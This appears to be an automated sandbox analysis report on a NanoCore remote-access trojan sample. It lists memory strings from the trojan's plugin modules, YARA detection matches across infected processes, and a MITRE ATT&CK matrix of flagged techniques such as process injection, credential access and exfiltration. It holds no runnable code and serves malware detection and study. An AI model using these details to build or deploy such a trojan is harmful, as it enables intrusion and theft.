      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts111
      Scripting      		1
      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		11
      Disable or Modify Tools      		21
      Input Capture      		1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts2
      Native API      		1
      Scheduled Task/Job      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol21
      Input Capture      		Exfiltration Over Bluetooth1
      Non-Standard Port      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts2
      Command and Scripting Interpreter      		21
      Registry Run Keys / Startup Folder      		312
      Process Injection      		111
      Scripting      		Security Account Manager4
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Data Encoding      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		Logon Script (Mac)1
      Scheduled Task/Job      		12
      Obfuscated Files or Information      		NTDS35
      System Information Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Remote Access Software      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script21
      Registry Run Keys / Startup Folder      		12
      Software Packing      		LSA Secrets341
      Security Software Discovery      		SSHKeyloggingData Transfer Size Limits1
      Non-Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      DLL Side-Loading      		Cached Domain Credentials121
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 Channel21
      Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Masquerading      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job121
      Virtualization/Sandbox Evasion      		Proc Filesystem11
      Application Window Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
      Process Injection      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
      Hidden Files and Directories      		Network Sniffing1
      Remote System Discovery      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
